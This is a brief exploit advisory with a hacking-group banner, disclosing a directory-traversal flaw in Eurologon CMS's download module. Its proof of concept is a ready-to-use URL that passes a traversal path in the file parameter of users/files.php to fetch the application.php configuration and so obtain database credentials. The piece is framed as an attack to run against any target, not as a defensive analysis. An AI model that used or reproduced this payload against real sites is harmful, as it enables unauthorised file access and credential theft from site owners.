/_ | ____ |\___ \ / | / |/ |
| |/ \ | | ( <_/ \ \ ______ | \ \
| | | \ | |/ \ \| | // | || |
||| /\| /____ /\___ >| ||||
\/\_____| \/ \/
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
Eurologon CMS Db credentials disclosure / files download
#By KiNgOfThEwOrLd
PoC
The download module, not correctly check the file parameter, then using directory traversal we can get all the files hosted in our target web space.
Get Database Credentials
http://[target]/users/files.php?mode=download&file=…/…/application.php